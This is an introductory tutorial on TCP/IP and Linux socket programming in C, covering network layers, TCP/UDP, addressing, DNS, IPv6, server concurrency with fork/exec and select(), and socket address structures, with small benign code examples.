
C & LINUX SOCKET: README FIRST

This is another TCP/IP network programming tutorial, this time using GNU C on the Linux/Fedora Core platform. It provides a fairly complete discussion, presented graphically and with working program examples, from basic networking up to the packet level. To get a good start you need some knowledge of and skill in the C programming language, and familiarity with the Linux/Fedora Core platform. The program examples include both client and server code, and you can test the client and the server on the same computer. Don't worry about GNU C; it is still based on Standard C (ISO/IEC). The compiler used is GCC (GNU Compiler Collection), running on the Linux/Fedora Core 3 platform. You can find how to compile using GCC and G++ (for C++) in GCC & G++ 1 and GCC & G++ 2. A GDB (GNU Debugger) how-to is also included. Tenouk needed to learn Linux sockets because that knowledge is required to learn and understand the buffer overflow problem in C and C++ coding.

C and Linux Socket Topics


Each topic provides notes and working program examples, from the fundamentals up to the four layers of the TCP/IP stack. Packet-level programming covering TCP, UDP, IP and other dominant protocols is also included. The code examples have been run on server and client machines to demonstrate their functionality through the program output. The topics are arranged to follow a gradual learning curve.

1. GNU C Programming Socket: Part 1 - Background story
2. GNU C Programming Socket: Part 2 - More on design considerations
3. GNU C Programming Socket: Part 3 - Server issues such as Iterative vs concurrency
4. GNU C Programming Socket: Part 4 - Header and APIs
5. GNU C Programming Socket: Part 5 - More on headers and APIs
6. GNU C Programming Socket: Part 6 - Story & Examples
7. GNU C Programming Socket: Part 7 - Story & Examples
8. GNU C Programming Socket: Part 8 - Story & Examples
9. GNU C Programming Socket: Part 9 - Story & Examples
10. GNU C Programming Socket: Part 10 - Story & Examples
11. GNU C Programming Socket: Part 11 - Story & Examples
12. GNU C Programming Socket: Part 12 - Story & Examples
13. GNU C Programming Socket: Part 13 - Story & Examples
14. GNU C Programming Advanced Network: Part 14 - Examples - Details TCP/IP stack
15. GNU C Programming Advanced Network: Part 15 - Examples
16. GNU C Programming Advanced Network: Part 16 - Examples
17. GNU C Programming Advanced Network: Part 17 - Examples
18. GNU C Programming Advanced Network: Part 18 - Examples
19. Linux/Unix Security Features
20. Internet Protocol version 6 (ipv6)
21. Wi-fi (wireless) security features
22. C & C++ Linux Socket Related Books

NETWORK PROGRAMMING LINUX SOCKET PART I: THE FUNDAMENTALS

Note: Program examples, if any, were compiled using gcc on a Linux Fedora Core 3 machine with several updates, as a normal user. The Fedora machine used for the testing had "No Stack Execute" disabled and SELinux set to its default configuration.

The abilities that should be acquired:

Able to understand the basics of the client-server model.
Able to understand the TCP/IP suite/stack/layers.
Able to understand important protocols such as TCP and UDP.
Able to understand and use the Unix/Linux C language socket APIs.
Able to understand and implement several simple basic client and server designs.

This Tutorial introduces network programming using sockets. Some of the information is implementation specific, but all the program examples run on Fedora 3 and were compiled using gcc. The following topics will be covered briefly:

Some Background Story.
The Client-Server Model.
Concurrent Processing.
Programming Interface.
The Socket Interface.
Client Design.
Example Clients.
Server Design.
Iterative, Connectionless Servers (UDP).
Iterative, Connection-Oriented Servers (TCP).
Concurrent, Connection-Oriented Servers (TCP).
Single-Process, Concurrent Servers (TCP).
Multi protocol Servers.
Multi service Servers.
Managing Server Concurrency.
Client Concurrency.

Some Background Story

This background story introduces the terms used in network programming and gives you the big picture. The following figure shows a typical physical connection of network devices.

Figure 1

Using the simple network shown in the figure above, let us trace the data stream from Network A to Network B, assuming that Network A is company A's network and Network B is company B's network. Physically, the data stream from a computer in Network A (the source) goes through the hub, the switch and the router. The stream then travels through a carrier such as the Public Switched Telephone Network (PSTN) or a leased line (copper, fiber or wireless satellite) and finally reaches Network B's router, goes through the switch and the hub, and arrives at the computer in company B (the destination). For this network device layout, the OSI (Open Systems Interconnection) 7-layer stack mapping is shown below.

Figure 2

From the Application layer of a computer at company A, the data goes down through the layers to the Physical layer (a medium such as Cat 5 cable), then exits Network A through the Network (router) layer in the middle of the diagram. After traveling through the carrier, it reaches the Network (router) layer of company B, travels through the Physical layer, and goes up until it reaches the Application layer of the computer at company B. In other words, at company B (the destination) the data flows through the network devices in the reverse order compared with company A (the source).

In contrast to TCP/IP, the OSI approach started from a clean slate and defined standards, adhering tightly to its own model, using a formal committee process without requiring implementations. Internet protocols use a less formal but more practical engineering approach, where anybody can propose and comment on Request For Comment (RFC) documents, and implementations are required to verify feasibility. The OSI protocols developed slowly, and because running the full protocol stack is resource intensive, they have not been widely deployed, especially in the desktop and small computer market. In the meantime, TCP/IP and the internet were developing rapidly, with deployment occurring at a very high rate, which is why the TCP/IP suite became a de facto standard. The OSI layers and their functions are listed briefly in the following table.

OSI Layer       Function provided
Application     Network applications such as file transfer and terminal emulation.
Presentation    Data formatting and encryption.
Session         Establishment and maintenance of sessions.
Transport       Provision for end-to-end reliable and unreliable delivery.
Network         Delivery of packets of information, which includes routing.
Data Link       Transfer of units of information, framing and error checking.
Physical        Transmission of binary data over a medium.

Table 1

In practical implementations, the standard used is based on the TCP/IP stack. It is a de facto standard rather than a formal one, but it is widely used and adopted. The mapping between the OSI and TCP/IP stacks is shown below. The TCP/IP stack is divided into 4 layers. The Session, Presentation and Application layers of OSI are combined into one layer, the Application layer. The Physical and Data Link layers also become one layer. Different books or documentation might use different terms, but the TCP/IP stack is usually described in terms of these 4 layers.

Figure 3

In this Tutorial we will concentrate on the Transport and Network layers of the TCP/IP stack. A more detailed TCP/IP stack with typical applications is shown below.

Figure 4

The following figure is a TCP/IP architectural model. Frame, packet and message are the same entity but are named differently at different layers, because the data is encapsulated at every layer.

Figure 5

The common applications that you encounter in everyday use are:

1. FTP (File Transfer Protocol).
2. SMTP (Simple Mail Transfer Protocol).
3. telnet (remote logins).
4. rlogin (simple remote login between UNIX machines).
5. World Wide Web (built on http) and https (secure http).
6. NFS (Network File System, originally from Sun Microsystems).
7. TFTP (Trivial File Transfer Protocol, used for booting).
8. SNMP (Simple Network Management Protocol).

The user interfaces (programs) developed for the communication depend on the platform.

Protocol

In computing, a protocol is a convention or set of standard rules that enables and controls the connection, communication and data transfer between two computing endpoints. Protocols may be implemented by hardware, software, or a combination of the two. At the lowest level, a protocol defines the behavior of a hardware connection. In terms of control, a protocol may provide data transfer reliability, resiliency and integrity. An actual communication is defined by various communication protocols. In the context of data communication, a network protocol is a formal set of rules, conventions and data structures that governs how computers and other network devices exchange information over a network. In other words, a protocol is a standard procedure and format that two data communication devices must understand, accept and use to be able to talk to each other. A wide variety of network protocols exist, defined by many standards organizations worldwide and by technology vendors over years of technology evolution and development. One of the most popular network protocol suites is TCP/IP, which is the heart of internetworking communications.

TCP and UDP Protocols

The TCP and UDP protocols are built on top of the IP protocol. The basics of TCP:

1. Transmission Control Protocol is defined by RFC-793.
2. TCP provides a connection-oriented, reliable transport service.
3. End-to-end transparent byte-stream.
4. E.g.: FTP, telnet, http, SMTP.

While for UDP:

1. User Datagram Protocol is defined by RFC-768.
2. UDP provides a packet-based datagram service.
3. Connectionless.
4. Unreliable.
5. E.g.: NFS, TFTP.

Port numbers and services

A port number is a 16-bit integer, so there are at most 2^16 = 65536 ports. A port is unique within a machine/IP address. Every service/application/daemon has its own port number. To make a connection we need the IP address and the port number of the service. A connection is defined by:

IP address & port of server + IP address & port of client

Normally, server port numbers are low numbers in the range 1 - 1023. These are called well-known port numbers and can normally be assigned by root (Administrator) only, a property that services such as rlogin rely on for authentication. Client port numbers are normally higher numbers, starting at 1024. A server running on a well-known port tells the OS which port it wants to listen on, whereas a client normally just lets the operating system pick a new port that isn't already in use.

Numeric IP Addresses

An IPv4 (Internet Protocol version 4) Internet address is a 32-bit integer. IP stands for Internet Protocol. For convenience, addresses are displayed in "dotted decimal" format: each byte is presented as a decimal number and dots separate the bytes, for example:

131.95.115.204

IP Address Classes

To simplify packet routing, internet addresses are divided into classes. An IP address has two parts: the network portion and the host portion. The network portion is unique to each company/organization/domain/group/network, and the host portion is unique to each network device (host) in the network. Where the network portion ends and the host portion begins is different for each class of IP address. You can determine this by looking at the high-order bits of the IP address.

192.168.1.100
xxxxxxxx.xxxxxxxx.xxxxxxxx.xxxxxxxx
Byte 1.Byte 2.Byte 3.Byte 4


Class and Network size   Range (decimal)   Network ID       Host ID
Class A (Large)          1 - 127           Byte 1           Bytes 2, 3, 4
Class B (Medium)         128 - 191         Bytes 1, 2       Bytes 3, 4
Class C (Small)          192 - 223         Bytes 1, 2, 3    Byte 4

Table 2

The leading bits of an address (within its first four bits, bits 0-3) determine its class:

0   = class A - bits 1-7 define a network, bits 8-31 define a host on that network. So we have 128 networks with 16 million hosts each.

10  = class B - bits 2-15 define a network, bits 16-31 define a host on that network. So we have 16384 networks with 65536 hosts each.

110 = class C - bits 3-23 define a network, bits 24-31 define a host on that network. So we have 2 million networks with 256 hosts each.

Table 3
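As a minimal sketch of the class rules above, the following function inspects the leading bits of a dotted-decimal address. It assumes the usual leading-bit patterns (0 for class A, 10 for class B, 110 for class C, 1110 for class D, 1111 for class E); the function name ipv4_class is only an illustration, not part of any library.

```c
#include <arpa/inet.h>
#include <stdint.h>

/*
 * Return 'A'..'E' for a dotted-decimal IPv4 address,
 * or '?' if the text is not a valid address.
 * ipv4_class is a hypothetical helper name.
 */
char ipv4_class(const char *dotted)
{
    struct in_addr in;
    uint32_t addr;

    if (inet_pton(AF_INET, dotted, &in) != 1)
        return '?';

    /* Convert to host byte order so "bit 0" is the most significant bit. */
    addr = ntohl(in.s_addr);

    if ((addr & 0x80000000u) == 0)           return 'A';  /* 0...    */
    if ((addr & 0xC0000000u) == 0x80000000u) return 'B';  /* 10...   */
    if ((addr & 0xE0000000u) == 0xC0000000u) return 'C';  /* 110...  */
    if ((addr & 0xF0000000u) == 0xE0000000u) return 'D';  /* 1110... */
    return 'E';                                           /* 1111... */
}
```

Called with the two sample addresses used earlier, 131.95.115.204 falls in class B (first byte 128 - 191) and 192.168.1.100 in class C (first byte 192 - 223).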

The IP network portion can represent a very large network that may span multiple geographic sites. To make this easier to manage, you can use subnetworks. Subnetworks use the two parts of the address to define a set of IP addresses that are treated as a group; subnetting divides the address space into smaller networks. You configure a subnetwork by defining a mask, which is a series of bits. The system then performs a logical AND operation on these bits and the IP address. The 1 bits define the subnetwork portion of the IP address (which must include at least the network portion). The 0 bits define the host portion. Class D is used for multicast addresses and class E is reserved.

As a summary:

Figure 6

Nowadays we use classless IP addressing. That means the class-based IP ranges are subnetted into smaller groups of IP addresses, creating smaller networks. An example is Classless Inter-Domain Routing (CIDR). Private domains normally use the private IP ranges, which cannot be routed on the Internet. A network technology that deploys private IP addresses is the Virtual Private Network (VPN), while advanced subnetting using private IP addresses can be found in the Virtual LAN (VLAN). Because IPv4 is running out of addresses, we now have IPv6 with 128-bit addresses.

Host Names and DNS

People need names, instead of dotted decimal numbers, to make the Internet simpler to use. The Domain Name System (DNS) can translate from a name (domain name) to a number (IP address) or from a number to a name. This is called name resolution. In Windows, name resolution is done by the Domain Name Service (DNS; the term and acronym match the Domain Name System, but this is the Microsoft implementation of it), and in Unices/Linux it is implemented using Berkeley Internet Name Domain (BIND).

Ethernet Addresses - MAC and ARP protocol

In a Local Area Network (LAN) there are, depending on the architecture, several network types such as Ethernet and Token Ring. The most widely used is Ethernet. Each Ethernet interface (Network Interface Card - NIC) has a unique Ethernet address provided by the manufacturer and hard coded into the NIC, normally called the Media Access Control (MAC) or physical address. Ethernet addresses are 6 bytes long, shown as 6 hexadecimal values separated by colons. For example: 00:C0:F0:1F:3C:27. You can see the MAC address by issuing the arp, ipconfig (Windows) or ifconfig (Linux) command, as shown below:

Figure 7

Figure 8

Ethernet packets have header and data sections. The header contains the source and destination Ethernet (MAC) addresses and a 2-byte packet type.

For IP packets, the data area contains the IP fields, which hold the source and destination IP addresses; these are more readable and more suitable for humans. To send to an IP address, a computer uses the Address Resolution Protocol (ARP) to determine the corresponding MAC address.

IPv6 - Internet Protocol version 6

The current IP is IPv4 (Internet Protocol version 4), which has 32-bit addresses. Because of the way the address space is split up, 32 bits are not enough. IPv6 has 128-bit addresses. Addresses are shown in a colon-separated hexadecimal format in which an internal run of 0s can be omitted. For example:

69DC:88F4:FFFF:0:ABCD:DBAC:1234:FBCD
A12B::F6
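To see how the colon hexadecimal notation maps onto the 128 bits, here is a small sketch using the standard inet_pton() and inet_ntop() calls. The helper names ipv6_parse and ipv6_format are made up for this illustration. It treats the example above as two separate addresses, a full eight-group one and the shortened A12B::F6.

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <string.h>
#include <sys/socket.h>

/*
 * Parse IPv6 text into its 16 raw bytes.
 * Returns 0 on success, -1 if the text is not a valid IPv6 address.
 * ipv6_parse is a hypothetical helper name.
 */
int ipv6_parse(const char *text, unsigned char bytes[16])
{
    struct in6_addr a;

    if (inet_pton(AF_INET6, text, &a) != 1)
        return -1;
    memcpy(bytes, a.s6_addr, 16);
    return 0;
}

/*
 * Format 16 raw bytes back into colon hexadecimal text.
 * Returns 0 on success, -1 if out is too small.
 * ipv6_format is a hypothetical helper name.
 */
int ipv6_format(const unsigned char bytes[16], char *out, socklen_t outlen)
{
    struct in6_addr a;

    memcpy(a.s6_addr, bytes, 16);
    return inet_ntop(AF_INET6, &a, out, outlen) != NULL ? 0 : -1;
}
```

Parsing A12B::F6 fills the first two bytes with 0xA1 0x2B, the last byte with 0xF6, and everything the "::" stands for with zeros. A string with more than eight groups is rejected by inet_pton().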

New service types exist to accommodate IPv6, for example in the multimedia and wireless fields. In Windows XP and above, you can try the ipv6 command at the prompt to view and/or set the IPv6 configuration. For example: ipv6 if.

Figure 9

Figure 10

Distributed Applications

The goal is to hide the fact that the application is distributed, other than to provide redundancy for reliability.
User interfaces can look identical.
Typically the data resides on remote systems.
In many instances, remote users interact with each other.

Application Protocols

A protocol is a set of rules defining how to communicate.
Application protocol: the communication rules for an application.
Standard protocols: documented in RFCs, such as ftp, telnet and http.
Non-standard protocols: programmers who write a distributed application in effect create a new protocol.
Programmers choose standard protocols where they apply.

E.g. telnet:

telnet computer.some.where [port_number]
telnet www.yahoo.com 23

A port is a number defining which service to connect to. For example, port 23 is the default for telnet services. In Linux, ports, protocols and service names are specified in /etc/services.

We will learn more about ports, protocols and services in other Modules.

Providing Concurrent Access to Services

Users expect an almost immediate response.
Network servers must handle multiple clients "apparently simultaneously".
The CPU resources and the network must be shared.
Normally this takes the form of multiple server processes, or multiple server threads in one process.

A more in-depth discussion of the TCP/IP suite is given in Advanced TCP/IP Tutorials.

NETWORK PROGRAMMING LINUX SOCKET PART 2: THE SERVER SIDE ISSUES


The Client-Server Model

TCP/IP enables peer-to-peer communication. Computers can cooperate as equals or in any desired way. Most distributed applications have special roles. For example:

1. Server waits for a client request.
2. Client requests a service from server.

Some Security Definitions

Authentication: verifying a computer's identity.
Authorization: determining whether permission is allowed.
Data security: preserving data integrity.
Privacy: preventing unauthorized access.
Protection: preventing abuse.

These security matters have evolved considerably. Standards have also been produced, such as the now obsolete C2 rating of the Trusted Computer System Evaluation Criteria (TCSEC), since superseded by Common Criteria and its ISO version, ISO 15408 Common Criteria for Information Technology Security Evaluation (another reference can be found at commoncriteriaportal.org).

Connectionless (UDP) vs Connection-Oriented (TCP) Servers

A programmer can choose a connection-oriented server or a connectionless server depending on the application. In Internet Protocol terminology, the basic unit of data transfer is a datagram, which is basically a header followed by some data. The datagram socket is connectionless.

User Datagram Protocol (UDP):

1. Is connectionless.
2. A single socket can send and receive packets from many different computers.
3. Best effort delivery.
4. Some packets may be lost, and some packets may arrive out of order.

Transmission Control Protocol (TCP):

1. Is connection-oriented.
2. A client must connect a socket to a server.
3. A TCP socket provides a bidirectional channel between client and server.
4. Lost data is re-transmitted.
5. Data is delivered in order.
6. Data is delivered as a stream of bytes.
7. TCP uses flow control.
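The difference between "datagrams" and "a stream of bytes" can be observed without a network at all. The sketch below is an assumption-laden stand-in: it uses socketpair() with the local AF_UNIX family instead of real UDP and TCP sockets, relying on the fact that SOCK_DGRAM and SOCK_STREAM keep the same message-boundary behavior there. The function name first_read_size is hypothetical.

```c
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * Write "ab" and then "cd" into one end of a local socket pair of the
 * given type (SOCK_DGRAM or SOCK_STREAM), then perform ONE read of up
 * to 16 bytes on the other end.
 * Returns the number of bytes that single read delivered, or -1 on error.
 * first_read_size is a hypothetical helper name.
 */
int first_read_size(int type)
{
    int sv[2];
    char buf[16];
    ssize_t n;

    if (socketpair(AF_UNIX, type, 0, sv) == -1)
        return -1;

    if (write(sv[0], "ab", 2) != 2 || write(sv[0], "cd", 2) != 2) {
        close(sv[0]);
        close(sv[1]);
        return -1;
    }

    /* Datagram: one message per read. Stream: whatever bytes are queued. */
    n = read(sv[1], buf, sizeof buf);

    close(sv[0]);
    close(sv[1]);
    return (int)n;
}
```

With SOCK_DGRAM the single read returns exactly the first 2-byte message. With SOCK_STREAM the boundaries between the two writes are not preserved, so the read may return anything from 2 to all 4 queued bytes; a stream receiver therefore has to do its own framing.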

It is simple for a single UDP server to accept data from multiple clients and reply. It is easier to cope with network problems using TCP.

Stateless vs Stateful Servers

A stateful server remembers client data (state) from one request to the next. A stateless server keeps no state information. Using a stateless file server, the client must:

1. Specify complete file names in each request.
2. Specify the location for reading or writing.
3. Re-authenticate for each request.

Using a stateful file server, the client can send less data with each request. A stateful server is simpler. On the other hand, a stateless server is:

1. More robust.
2. Lost connections can't leave a file in an invalid state.
3. Rebooting the server does not lose state information, because no state information is held.
4. Rebooting the client does not confuse a stateless server.

Concurrent Processing

Concurrency

Real or apparent simultaneous processing.
Time-sharing: a single CPU switches from one process to the next.
Multiprocessing: multiple CPUs handle processes.

Network Concurrency

Multiple distributed applications share a network.
With a single Ethernet segment or hub, only one packet at a time can use the network. Network sharing is like time-sharing.
With a switch, multiple packets can be in transit simultaneously, like multiprocessing.
With several networks, multiple packets can be in transit, like having multiple computers.

Server Concurrency

An iterative server finishes one client request before accepting another.
An iterative telnet daemon is almost useless.
Concurrent servers are difficult to write.
We will consider several designs for concurrency.

Programs vs Processes

Program: executable instructions.
Process: a program being executed.
Each process has its own private data, e.g. multiple pico processes have different text on the screen.
Concurrency using fork() in UNIX/Linux

/* testpid.c */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

int main (int argc, char **argv)
{
    int i, pid;

    /* fork() returns twice: 0 in the child, the child's pid in the parent */
    pid = fork();
    printf("Forking...the pid: %d\n", pid);

    /* both processes print their own process id five times */
    for (i = 0; i < 5; i++)
        printf(" %d %d\n", i, getpid());

    /* only the parent (non-zero pid) waits for the child to exit */
    if (pid)
        wait(NULL);
    return 0;
}

[bodo@bakawali testsocket]$ gcc -g testpid.c -o testpid
[bodo@bakawali testsocket]$ ./testpid
Forking...the pid: 0
 0 27166
 1 27166
 2 27166
 3 27166
 4 27166
Forking...the pid: 27166
 0 27165
 1 27165
 2 27165
 3 27165
 4 27165

A new process starts execution by returning from fork().
Child and parent are nearly identical.
The parent gets the child's process id from fork().
The child gets 0 back from fork().
The parent should wait for the child to exit.

Time slicing

Round robin technique.
The operating system is interrupted regularly by a clock.
In the clock interrupt handler, the kernel checks whether the current process has exceeded its time quantum.
Processes are forced to take turns using the CPU, but every process gets its time slice.

Using exec family to execute a new program in UNIX/Linux

The following are the exec family prototypes.

int execve(const char *path, char *const argv[], char *const envp[]);
int execl(const char *path, const char *arg, ...);
int execlp(const char *file, const char *arg, ...);
int execle(const char *path, const char *arg, ..., char *const envp[]);
int execv(const char *path, char *const argv[]);
int execvp(const char *file, char *const argv[]);

The exec family executes a new program (same process id).
The first argument is the new program. If the parameter is named path, a pathname is required; if it is named file, the program is searched for in the directories listed in the PATH environment variable.
Program arguments follow as a list or a vector.
execve() and execle() allow specifying the environment.

Context Switching

Having multiple server processes means context switches.
A context switch consumes CPU time.
Other processes are blocked during that time.
We must consider the benefits of multiple servers versus the overhead.
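The fork() and exec calls described in this section are usually combined: the parent forks, the child replaces itself with a new program, and the parent waits. The following is a minimal sketch under that assumption; run_and_wait is a hypothetical helper name, and the exit code 127 for a failed exec is a convention borrowed from shells, not something this Tutorial prescribes.

```c
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/*
 * Run a program found through PATH, with no extra arguments, in a child
 * process and wait for it to finish.
 * Returns the child's exit status (127 if the exec failed in the child),
 * or -1 if fork()/waitpid() failed or the child did not exit normally.
 * run_and_wait is a hypothetical helper name.
 */
int run_and_wait(const char *prog)
{
    int status;
    pid_t pid = fork();

    if (pid == -1)
        return -1;                      /* fork failed, no child created */

    if (pid == 0) {
        /* Child: fork() returned 0. Replace this process image. */
        execlp(prog, prog, (char *)NULL);
        _exit(127);                     /* reached only if execlp() failed */
    }

    /* Parent: fork() returned the child's process id. */
    if (waitpid(pid, &status, 0) == -1)
        return -1;

    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

For instance, run_and_wait("true") should return 0 on a system that provides the true utility. Because execlp() takes a file argument, the program is located through PATH; execl() would need a pathname instead.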

Asynchronous I/O

Asynchronous (as opposed to synchronous) I/O means allowing a process to start an I/O operation and proceed with other work while the I/O takes place. A related term is non-blocking (as opposed to blocking). Asynchronous/non-blocking I/O generally provides a more robust and efficient way of handling concurrent connections. UNIX I/O can be handled this way if you use select(). A process asks the select() system call to tell it which of a collection of file descriptors are ready for I/O. After calling select(), the process can call read() or write() to perform the I/O, which at that point is no more than copying data to/from kernel space, with the real I/O either already done or scheduled for later. A server process can use select() to determine which of a collection of sockets it can read without blocking.

Programming Interfaces
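As a minimal sketch of the select() call described under Asynchronous I/O, the function below asks whether one descriptor can be read without blocking, giving up after a timeout. The name readable_within and the millisecond timeout parameter are choices made for this illustration; a real server would normally place many descriptors in the set.

```c
#include <sys/select.h>
#include <sys/time.h>
#include <unistd.h>

/*
 * Wait up to timeout_ms milliseconds for fd to become readable.
 * Returns 1 if a read() on fd would not block, 0 on timeout, -1 on error.
 * readable_within is a hypothetical helper name.
 */
int readable_within(int fd, int timeout_ms)
{
    fd_set rfds;
    struct timeval tv;
    int n;

    FD_ZERO(&rfds);
    FD_SET(fd, &rfds);                  /* the set holds just this one fd */

    tv.tv_sec = timeout_ms / 1000;
    tv.tv_usec = (timeout_ms % 1000) * 1000;

    /* First argument is the highest descriptor number plus one. */
    n = select(fd + 1, &rfds, NULL, NULL, &tv);
    if (n == -1)
        return -1;

    return (n > 0 && FD_ISSET(fd, &rfds)) ? 1 : 0;
}
```

With an empty pipe the call reports 0 after the timeout; once a byte has been written to the other end it reports 1, and the following read() only copies data that the kernel already holds.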
TCP/IP Application Programming Interface (API)

API: routines supplied by the OS that define the interface between an application and the protocol software.
It is better to avoid vendor-specific data formats and features; use standard APIs for portability.
The API only suggests the required functionality; the details depend on the implementation.
For UNIX: socket (the original Berkeley system calls) and TLI (Transport Layer Interface - AT&T UNIX System V).
For Apple Mac: MacTCP.
For MS Windows: Winsock (still based on the Berkeley socket) and Winsock in .NET.
There are also other TCP/IP APIs that are implementation dependent.
Unices' TCP/IP APIs are kernel system calls.
Mac and Windows use extensions/drivers and dynamic link libraries (dll).
In this Tutorial we will use the socket APIs; in general, "socket" refers to the socket APIs, which include socket().
In fact the APIs are just routines/functions in the C language.

Required Functionality

Allocate resources for communication, such as memory.
Specify local and remote endpoints.
Initiate a client connection.
Wait for a client connection.
Send or receive data.
Determine when data arrives.
Generate urgent data.
Handle received urgent data.
Terminate a connection.
Abort.
Handle errors.
Release resources.

System Calls

An operating system should run user programs in a restricted mode, i.e. a user program should not do I/O directly.
User programs should make a system call to allow trusted code to perform the I/O.
In UNIX, functions like open(), read(), write() and close() are actually system calls.
A UNIX system call is a transition from user mode to kernel mode.
TCP/IP code is called through system calls.
UNIX I/O with TCP/IP

To a certain degree, I/O with sockets is like file I/O.
TCP/IP sockets are identified using file descriptors.
read() and write() work with TCP/IP sockets.
open() is not adequate for making a connection.
Calls are needed to allow servers to wait for connections.
UDP data is always a datagram and not a stream of bytes.

The Socket Interface

A socket is an Application Programming Interface (API) used for Interprocess Communication (IPC). It is a well-defined method of connecting two processes, locally or across a network. It is protocol and language independent. It is often referred to as Berkeley Sockets or BSD Sockets. The following figure illustrates the client/server relationship of the socket APIs for a connection-oriented protocol (TCP).

Figure 8

The following figure illustrates the client/server relationship of the socket APIs for a connectionless protocol (UDP).

Figure 9

Berkeley Sockets: API for TCP/IP Communication

Uses existing I/O features where possible.
Allows TCP/IP connections, internal connections, and possibly more.
Started in BSD UNIX in the 1980s.
BSD UNIX was adopted by Sun, Tektronix and Digital.
Now the socket interface is a de facto standard.
Sockets make the network look much like a file system.

Socket Descriptors

UNIX open() yields a file descriptor: a small integer used to read/write a file.
UNIX keeps a file descriptor table for each process: an array of pointers to the data about the open files.
A file descriptor is used to index the array.
Sockets are added to this abstraction.
The socket() system call returns a socket descriptor.
Actually, files and sockets are accessed using the same table.
The structure pointed to by a table entry has a field which tells whether it is a file or a socket.

System Data Structures for Sockets

In order to use a socket, the kernel needs to keep track of several pieces of data, as follows:

1. Protocol Family: a parameter to the socket() call.
2. Service Type (Stream, Datagram): a parameter to the socket() call.
3. Local IP Address: can be set with bind().
4. Local Port: can be set with bind().
5. Remote IP Address: can be set with connect().
6. Remote Port: can be set with connect().
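The six values listed above can be made visible with a short sketch. It uses a UDP socket so that connect() only records the remote endpoint and no server has to be running. The loopback address 127.0.0.1, the remote port 9 and the names make_addr and endpoints_demo are all assumptions chosen for the illustration.

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Fill a sockaddr_in from a dotted-decimal address and a host-order port. */
static int make_addr(struct sockaddr_in *sa, const char *ip, unsigned short port)
{
    memset(sa, 0, sizeof *sa);
    sa->sin_family = AF_INET;
    sa->sin_port = htons(port);
    return inet_pton(AF_INET, ip, &sa->sin_addr) == 1 ? 0 : -1;
}

/*
 * Create a UDP socket, set its local endpoint with bind() and its remote
 * endpoint with connect(), then read back what the kernel recorded.
 * Returns 0 on success and fills *local and *remote, -1 on any failure.
 * endpoints_demo is a hypothetical helper name.
 */
int endpoints_demo(struct sockaddr_in *local, struct sockaddr_in *remote)
{
    struct sockaddr_in want_local, want_remote;
    socklen_t len;
    int fd, rc = -1;

    fd = socket(PF_INET, SOCK_DGRAM, 0);    /* values 1 and 2: family, type */
    if (fd == -1)
        return -1;

    if (make_addr(&want_local, "127.0.0.1", 0) == 0 &&   /* port 0: OS picks */
        make_addr(&want_remote, "127.0.0.1", 9) == 0 &&  /* assumed port 9 */
        bind(fd, (struct sockaddr *)&want_local,
             sizeof want_local) == 0 &&                  /* values 3 and 4 */
        connect(fd, (struct sockaddr *)&want_remote,
                sizeof want_remote) == 0) {              /* values 5 and 6 */
        len = sizeof *local;
        if (getsockname(fd, (struct sockaddr *)local, &len) == 0) {
            len = sizeof *remote;
            if (getpeername(fd, (struct sockaddr *)remote, &len) == 0)
                rc = 0;
        }
    }

    close(fd);
    return rc;
}
```

After a successful call, local holds 127.0.0.1 with whatever free port the operating system picked, and remote holds 127.0.0.1 with port 9. With a TCP (SOCK_STREAM) socket the same calls apply, but connect() would then actually contact a server.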
Ultimately all 6 values must be known to 'make' the communication.

Active vs Passive Sockets

A server uses a passive socket to wait for client connections.
A client uses an active socket to initiate a connection.
Both start by using the socket() call.
Later on, servers and clients use other calls.

Socket Endpoints

TCP/IP communication occurs between 2 endpoints. An endpoint is defined as an IP address and a port number. To allow other protocols to merge into the socket abstraction, address families are used. We will use PF_INET for the internet protocol family and AF_INET for the internet address family. Normally PF_INET = AF_INET = 2. The socket types for AF_INET are listed in the following table.

Socket type   TYPE             Protocol
STREAM        SOCK_STREAM      TCP, Systems Network Architecture (SNA-IBM), Sequenced Packet eXchange (SPX-Novell).
SEQPACKET     SOCK_SEQPACKET   SPX.
DGRAM         SOCK_DGRAM       UDP, SNA, Internetwork Packet eXchange (IPX-Novell).
RAW           SOCK_RAW         IP.

Table 4: AF_INET socket combinations

There are other address families that you may come across, such as:

1. AF_UNIX
2. AF_NS
3. AF_TELEPHONY

AF_UNIX address family

The system uses this address family for communication between two programs that are on the same physical machine. The address is a path name to an entry in a hierarchical file system. Sockets with address family AF_UNIX use the sockaddr_un address structure:

struct sockaddr_un {
    short sun_family;
    char sun_path[126];
};

The sun_family field is the address family. The sun_path field is the pathname; its size varies between systems. The <sys/un.h> header file contains the sockaddr_un address structure definition. For the AF_UNIX address family, protocol specifications do not apply because protocol standards are not involved. The communication mechanism between the two processes on the same machine is specific to that machine.

AF_NS address family

This address family uses addresses that follow the Novell or Xerox NS protocol definitions. An address consists of a 4-byte network, a 6-byte host (node), and a 2-byte port number. Sockets with address family AF_NS use the sockaddr_ns address structure:

struct sockaddr_ns {
    unsigned short sns_family;
    struct ns_addr sns_addr;
    char sns_zero[2];
};

AF_TELEPHONY address family

Telephony domain sockets (sockets that use the AF_TELEPHONY address family) permit the user to initiate (dial) and complete (answer) telephone calls through an attached ISDN telephone network using standard socket APIs. The sockets forming the endpoints of a connection in this domain are really the called (passive endpoint) and calling (active endpoint) parties of a telephone call. The AF_TELEPHONY addresses are telephone numbers that consist of up to 40 digits (0 - 9), which are contained in sockaddr_tel address structures. The system supports AF_TELEPHONY sockets only as connection-oriented (type SOCK_STREAM) sockets. Keep in mind that a connection in the telephony domain provides no more reliability than that of the underlying telephone connection. If guaranteed delivery is desired, you must accomplish this at the application level, such as in fax applications that use this family. Sockets with address family AF_TELEPHONY use the sockaddr_tel address structure.

struct sockaddr_tel {
    short stel_family;
    struct tel_addr stel_addr;
    char stel_zero[4];
};

The telephony address consists of a 2-byte length followed by a telephone number of up to 40 digits (0 - 9).

struct tel_addr {
    unsigned short t_len;
    char t_addr[40];
};

The stel_family field is the address family. The stel_addr field is the telephony address, and stel_zero is a reserved field. The <nettel/tel.h> header file contains the tel_addr and sockaddr_tel structure definitions.

NETWORK PROGRAMMING LINUX SOCKET PART 3: MORE ON APIs


